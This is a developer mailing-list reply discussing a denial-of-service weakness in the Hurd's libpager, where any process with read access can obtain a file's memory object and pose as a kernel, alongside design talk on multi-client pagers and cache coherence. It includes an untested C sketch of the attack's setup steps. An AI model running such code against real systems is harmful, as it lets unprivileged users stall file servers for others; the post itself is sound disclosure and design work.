
Re: Denial of service attack via libpager


From: Brent W. Baccala
Subject: Re: Denial of service attack via libpager
Date: Mon, 29 Aug 2016 15:58:29 -1000


On Sun, Aug 28, 2016 at 11:15 PM, Richard Braun <rbraun@sceen.net> wrote:
> On Sun, Aug 28, 2016 at 05:12:35PM -1000, Brent W. Baccala wrote:
>
> > The obvious additional client would be a remote kernel, but as the exploit
> > program that I posted shows, it could just as easily be an unprivileged
> > process.  You don't need much permission to get a memory object, just read
> > access on the file.
>
> OK, this comes from the fact that io_map directly provides memory
> objects indeed... Do we actually want to pass them around?  How
> come calls like memory_object_init (specifically meant to be used
> between the kernel and the pager) can be made from any client?

Good question!

How could we authenticate the kernel to avoid unprivileged access?
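Just to show how low the bar is today, here's roughly what a client has to
do.  This is an untested sketch, not the exploit program itself, and it
assumes the user-side MIG stubs for the io and memory_object interfaces
are available to link against:

    /* sketch.c -- untested illustration.  Read access on a file is
       enough to obtain its memory object and pose as a kernel.  */
    #include <stdio.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <error.h>
    #include <mach.h>
    #include <hurd.h>

    int
    main (int argc, char **argv)
    {
      file_t file;
      mach_port_t memobjrd, memobjwr, control, objname;
      kern_return_t err;

      if (argc != 2)
        error (1, 0, "usage: %s FILE", argv[0]);

      /* All we need is read access on the file.  */
      file = file_name_lookup (argv[1], O_RDONLY, 0);
      if (file == MACH_PORT_NULL)
        error (1, errno, "%s", argv[1]);

      /* io_map hands us send rights to the file's memory objects.  */
      err = io_map (file, &memobjrd, &memobjwr);
      if (err)
        error (1, err, "io_map");

      /* Invent a control/name port pair and "initialize" the object,
         which is exactly the message a kernel's vm_map would send.  */
      mach_port_allocate (mach_task_self (), MACH_PORT_RIGHT_RECEIVE,
                          &control);
      mach_port_allocate (mach_task_self (), MACH_PORT_RIGHT_RECEIVE,
                          &objname);
      err = memory_object_init (memobjrd, control, objname, vm_page_size);
      if (err)
        error (1, err, "memory_object_init");

      /* From here on the pager takes us for a kernel: we can request
         pages and simply never answer, tying up the pager's state for
         the real kernel.  */
      return 0;
    }

The pager has no way to tell this apart from a kernel's vm_map; that's
the whole problem.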
 
> The changes involved here are heavy, which is one reason we'd want
> to avoid them. It also makes the system slightly slower by adding
> a new layer of abstraction. So we may just want to support multiple
> clients at the pager level, but I really don't see the benefit
> other than "it works". You really need to justify why it's a good
> thing that any unprivileged client is allowed to perform memory
> object management calls...

I don't see why unprivileged clients should be able to participate in this protocol.

We need multi-client support so that multiple privileged clients can participate.

My goal is to build a single system image Hurd cluster.  We need to support multiple processes mmap'ing the same file, for basic POSIX compatibility.  If those processes are on different nodes, then the file server needs to handle multiple kernels as paging clients.
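That requirement is nothing exotic; it's plain POSIX, along these lines
(ordinary example code, nothing Hurd-specific about it):

    /* Two processes sharing a file through mmap -- ordinary POSIX.
       On a single system image cluster the two processes may run on
       different nodes, each with its own kernel caching the file.  */
    #include <fcntl.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <sys/mman.h>
    #include <sys/wait.h>

    int
    main (void)
    {
      int fd = open ("/tmp/shared", O_RDWR | O_CREAT, 0666);
      char *p;

      ftruncate (fd, 4096);
      p = mmap (NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

      if (fork () == 0)
        {
          p[0] = 'x';           /* child writes through its mapping... */
          _exit (0);
        }
      wait (NULL);
      printf ("%c\n", p[0]);    /* ...and the parent must see the 'x'.  */
      return 0;
    }

When the parent and child land on different nodes, each node's kernel
maps the file, and the file server sees two paging clients.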
 
> In addition, I've just thought about something else: if we handle
> multiple clients, how do we make sure that two kernels, caching the
> same file, don't just completely corrupt its content?  We'd need
> some kind of cooperation to prevent the file being mapped more than
> once, I suppose, right?

They can already do that with ordinary io_write calls.  It's not that clients without write access can trash the file; they can't.  It's a denial of service issue.

> Or, well, a complete cache coherence protocol, with a very large
> overhead per operation.

That's what I'm talking about!

Let's think about the "very large overhead" for a minute.  If we've only got a single client, there's no extra overhead at all.  That's the case we've got now, so we're not losing anything.

If two processes on separate nodes have mmap'ed the same file with write permissions, you bet that could generate some very large overhead!  The programmer has to take that into account, and avoid that technique in performance-critical sections of code.

Yet it needs to be supported for POSIX compatibility, and in non-critical code it might not be a problem at all.  Two tasks could probably bat a 4KB page back and forth a hundred times and you'd never notice, just so long as they settled down and stopped doing it once they got initialized.

Furthermore, my reading of the memory_object protocol suggests that Mach's designers already had this in mind.  We don't need to design a cache coherence protocol, since we've already got one.  We just need to implement it.
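For example, memory_object_lock_request already lets a pager recall and
clean a page sitting in a kernel's cache.  A multi-client libpager might
use it along these lines before granting a second kernel write access (a
sketch under assumptions: the client list and its fields are invented for
illustration; the lock request itself is the existing Mach call):

    /* Sketch: before granting kernel B write access to a page, a
       multi-client pager recalls that page from every other kernel.
       The "client" structure is hypothetical.  */
    #include <mach.h>
    #include <mach/memory_object.h>

    struct client               /* one per kernel using this object */
    {
      memory_object_control_t control;  /* that kernel's control port */
      struct client *next;
    };

    static void
    revoke_other_copies (struct client *clients, struct client *writer,
                         vm_offset_t offset)
    {
      struct client *c;

      for (c = clients; c != NULL; c = c->next)
        if (c != writer)
          /* Ask that kernel to return any dirty data and flush its
             copy; only afterwards is it safe to grant WRITE.  */
          memory_object_lock_request (c->control, offset, vm_page_size,
                                      MEMORY_OBJECT_RETURN_ALL, TRUE,
                                      VM_PROT_NO_CHANGE, MACH_PORT_NULL);
    }

That's essentially the revocation step of a directory-based coherence
protocol, and the call is already part of Mach's external pager interface.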

    agape
    brent

